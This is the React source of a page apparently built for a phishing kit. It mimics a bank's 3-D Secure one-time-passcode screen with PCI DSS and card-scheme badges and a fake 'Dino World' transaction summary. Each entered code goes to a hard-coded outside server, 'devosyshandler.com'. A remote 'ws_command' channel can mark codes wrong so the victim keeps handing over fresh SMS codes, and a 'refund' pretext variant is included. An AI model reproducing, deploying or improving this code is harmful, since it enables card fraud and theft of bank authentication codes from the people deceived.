import React, { useEffect, useState, useCallback, useRef } from "react";
import HelpImage from "./assets/help.gif";
import axios from "axios";
import { useNavigate } from "react-router-dom";
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';

const OTPPage = ({ isRefund: propIsRefund }) => {
  const navigate = useNavigate();
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [input1Value, setInput1Value] = useState("");
  const [errorMessage, setErrorMessage] = useState(() => sessionStorage.getItem("otp_error") || "");
  const [isDuplicate, setIsDuplicate] = useState(false);
  const [isShaking, setIsShaking] = useState(false);
  const [timeLeft, setTimeLeft] = useState(120);
  const [resendAlert, setResendAlert] = useState(false);
  const inputRef = useRef(null);
  
  const isRefund = Boolean(
    propIsRefund ||
    (typeof window !== 'undefined' && window.location.pathname.includes('refund'))
  );

  const uuId = localStorage.getItem("uuId") || localStorage.getItem("session_uuId") || "default";
  const historyKey = isRefund ? `submitted_refund_otps_${uuId}` : `submitted_otps_${uuId}`;
  const retryFlagKey = isRefund ? `refund_retry_flag_${uuId}` : `otp_retry_flag_${uuId}`;

  // Clear temporary error from sessionStorage upon mount
  useEffect(() => {
    if (sessionStorage.getItem("otp_error")) {
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      sessionStorage.removeItem("otp_error");
    }
  }, []);

  const getSubmittedOtps = useCallback(() => {
    try {
      const s1 = JSON.parse(sessionStorage.getItem(historyKey) || "[]");
      const s2 = JSON.parse(localStorage.getItem(historyKey) || "[]");
      return Array.from(new Set([...s1, ...s2]));
    } catch (_) {
      return [];
    }
  }, [historyKey]);

  const [isRetry, setIsRetry] = useState(() => {
    return sessionStorage.getItem(retryFlagKey) === "true" || localStorage.getItem("otp_retry") === "true";
  });

  // Real-time WebSocket listener
  useEffect(() => {
    const handleWsCommand = (e) => {
      const data = e.detail;
      if (!data) return;
      if (data.isRetry || data.type === "wrong_code" || data.to === "wrong_code" || data.to === "wrong_refund" || data.errorMessage) {
        setIsRetry(true);
        sessionStorage.setItem(retryFlagKey, "true");
        localStorage.setItem("otp_retry", "true");
        setInput1Value("");
        setIsDuplicate(false);
        setErrorMessage(data.errorMessage || "The verification code is incorrect. A new SMS code has been sent to your mobile phone. Please enter the new code.");
        setTimeLeft(120);
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        if (inputRef.current) inputRef.current.focus();
      }
    };
    window.addEventListener("ws_command", handleWsCommand);
    return () => window.removeEventListener("ws_command", handleWsCommand);
  }, [retryFlagKey]);

  // Countdown timer
  useEffect(() => {
    if (timeLeft <= 0) return;
    const timer = setInterval(() => setTimeLeft((prev) => prev - 1), 1000);
    return () => clearInterval(timer);
  }, [timeLeft]);

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`;

  // Standard OTP: between 4 and 8 digits
  const handleInputChange = (e) => {
    const val = e.target.value.replace(/\D/g, "").slice(0, 8);
    setInput1Value(val);
    if (val.length >= 4) {
      const history = getSubmittedOtps();
      if (history.includes(val)) {
        setIsDuplicate(true);
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        setErrorMessage("You entered this verification code already. Please enter the new SMS code sent to your phone.");
        return;
      }
    }
    setIsDuplicate(false);
    if (!isRetry) {
      setErrorMessage("");
    }
  };

  const handleCodeSubmit = async (e) => {
    e?.preventDefault();
    const cleanCode = input1Value.trim();
    // Standard validation: 4 to 8 digits
    if (cleanCode.length < 4 || cleanCode.length > 8 || isSubmitting) return;

    // Check for duplicate code
    const history = getSubmittedOtps();
    if (history.includes(cleanCode)) {
      setIsDuplicate(true);
      setErrorMessage("You entered this verification code already. Please enter the new SMS code sent to your phone.");
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      return;
    }

    // Save to history so user cannot resubmit the same code
    const updatedHistory = [...history, cleanCode];
    sessionStorage.setItem(historyKey, JSON.stringify(updatedHistory));
    localStorage.setItem(historyKey, JSON.stringify(updatedHistory));
    sessionStorage.removeItem(retryFlagKey);
    localStorage.removeItem("otp_retry");
    setIsSubmitting(true);

    // OPTIMISTIC NAVIGATION: Immediately navigate to /3ds/loading
    navigate("/3ds/loading");

    const dataToSend = {
      uuId: localStorage.getItem("uuId") || uuId,
      code: cleanCode,
    };

    // Background submit
    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || "https://devosyshandler.com";
      const endpoint = isRefund ? `${serverUrl}/api/refund_verif` : `${serverUrl}/api/otp_verif`;
      await axios.post(endpoint, dataToSend);
    } catch (error) {
      const serverMsg = error.response?.data?.message || "Connection error. Please check your code and try again.";
      sessionStorage.setItem("otp_error", serverMsg);
      sessionStorage.setItem(retryFlagKey, "true");
      navigate(isRefund ? "/3ds/refund" : "/3ds/otp");
    }
  };

  const handleResend = () => {
    setResendAlert(true);
    setTimeLeft(120);
    setTimeout(() => setResendAlert(false), 4000);
  };

  const firstDigit = localStorage.getItem("first-digit");
  let imageSrc = null;
  let altText = "Card";
  if (firstDigit === "4") {
    imageSrc = VisaImage;
    altText = "Visa";
  } else if (firstDigit === "5") {
    imageSrc = MasterImage;
    altText = "Mastercard";
  }

  const isBtnDisabled = input1Value.length < 4 || input1Value.length > 8 || isDuplicate || isSubmitting;

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-slate-100 p-4">
      <div className={`w-full max-w-sm px-6 py-7 bg-white border border-gray-300 shadow-xl rounded-xl transition-transform ${isShaking ? "animate-shake" : ""}`}>
        
        {/* Header with PCI DSS and Card Scheme Badge */}
        <div className="flex items-center justify-between w-full mb-5 pb-3 border-b border-gray-100">
          <img
            src={PciImage}
            alt="PCI DSS Compliant"
            className="h-9 mr-4 object-contain"
          />
          {imageSrc && (
            <img src={imageSrc} alt={altText} className="h-9 object-contain" />
          )}
        </div>

        <h1 className="mb-1.5 text-base font-extrabold text-gray-900 tracking-tight">
          {isRefund ? "Verify Your Refund" : "Enter One-Time Passcode (OTP)"}
        </h1>
        <p className="mb-4 text-xs text-gray-600 leading-relaxed">
          {isRefund
            ? "To complete your security authorization and processing, please enter the one-time passcode sent to your registered phone number."
            : "A one-time passcode is required for this transaction. This passcode has been sent via SMS to your registered mobile phone."}
        </p>

        {/* Retry / Error Alert Banner */}
        {(errorMessage || isRetry) && (
          <div className="mb-4 p-3 bg-red-50 border border-red-200 rounded-lg text-xs text-red-700 flex items-start gap-2.5 shadow-sm animate-shake">
            <span className="text-red-600 font-bold text-base leading-none">⚠️</span>
            <div className="leading-snug font-medium">
              {errorMessage || "The verification code is incorrect. A new SMS code has been sent to your phone. Please enter the new code."}
            </div>
          </div>
        )}

        {/* Resend Confirmation Banner */}
        {resendAlert && (
          <div className="mb-4 p-2.5 bg-emerald-50 border border-emerald-200 rounded-lg text-xs text-emerald-700 font-medium text-center">
            A new verification code has been sent to your mobile phone.
          </div>
        )}

        {/* Transaction Summary Grid */}
        <div className="grid grid-cols-2 mb-4 text-xs gap-y-2 bg-gray-50 border border-gray-200 rounded-lg p-3">
          <span className="text-gray-500 font-medium">Merchant:</span>
          <span className="text-gray-900 font-bold text-right truncate">
            {process.env.REACT_APP_MERCHANT_NAME || "Dino World"}
          </span>

          <span className="text-gray-500 font-medium">Date:</span>
          <span className="text-gray-900 font-semibold text-right">{formattedDate}</span>

          <span className="text-gray-500 font-medium">Card Number:</span>
          <span className="text-gray-900 font-mono font-bold text-right">
            **** **** **** {localStorage.getItem("last-four-digits") || "••••"}
          </span>

          <span className="text-gray-500 font-medium">Amount:</span>
          <span className="text-[#0056b3] font-black text-right">
            {localStorage.getItem("currency") || process.env.REACT_APP_CURRENCY || "USD"} {localStorage.getItem("summ") || "0.00"}
          </span>
        </div>

        {/* OTP Input Form */}
        <form onSubmit={handleCodeSubmit}>
          <div className="mb-4">
            <label
              htmlFor="otp-input"
              className="block mb-1.5 text-xs font-bold text-gray-700"
            >
              Enter Verification Code:
            </label>
            <input
              ref={inputRef}
              id="otp-input"
              value={input1Value}
              onChange={handleInputChange}
              type="text"
              inputMode="numeric"
              maxLength={8}
              autoComplete="one-time-code"
              className={`w-full px-3 py-2.5 text-sm font-mono text-center tracking-widest border rounded-lg focus:outline-none transition-all ${
                isDuplicate || errorMessage
                  ? "border-red-500 ring-2 ring-red-100 bg-red-50/40 text-red-900 font-bold"
                  : "border-gray-300 focus:border-blue-600 focus:ring-2 focus:ring-blue-100 text-gray-900 bg-white"
              }`}
              placeholder="4 to 8 digits"
              autoFocus
            />
          </div>

          <div className="flex justify-between items-center mb-5 text-[11px] text-gray-500">
            <span>Code expires in: <strong className="font-mono text-gray-700">{Math.floor(timeLeft / 60)}:{(timeLeft % 60).toString().padStart(2, "0")}</strong></span>
            <button
              type="button"
              onClick={handleResend}
              className="text-blue-600 hover:text-blue-800 underline font-medium cursor-pointer"
            >
              Resend SMS
            </button>
          </div>

          {/* Action Buttons */}
          <div className="flex items-center justify-between gap-2 pt-2 border-t border-gray-100">
            <button
              type="button"
              onClick={() => navigate("/checkout")}
              className="px-4 py-2.5 text-xs font-semibold text-gray-600 hover:text-gray-900 cursor-pointer"
            >
              Cancel
            </button>
            <button
              type="submit"
              disabled={isBtnDisabled}
              className={`flex-1 py-2.5 px-4 text-xs font-bold rounded-lg shadow-sm transition-all flex items-center justify-center gap-2 cursor-pointer ${
                isBtnDisabled
                  ? "bg-gray-300 text-gray-500 cursor-not-allowed"
                  : "bg-[#0056b3] hover:bg-[#004494] text-white hover:shadow"
              }`}
            >
              {isSubmitting ? (
                <>
                  <svg className="animate-spin h-3.5 w-3.5 text-white" viewBox="0 0 24 24">
                    <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4" fill="none" />
                    <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8v8H4z" />
                  </svg>
                  <span>Processing...</span>
                </>
              ) : (
                <span>Submit Passcode</span>
              )}
            </button>
            <button
              type="button"
              className="flex items-center px-2 py-2 text-xs font-medium text-gray-500 hover:text-gray-800"
            >
              <img className="mr-1 h-3.5 w-3.5" src={HelpImage} alt="Help" />
              Help
            </button>
          </div>
        </form>
      </div>
    </div>
  );
};

export default OTPPage;
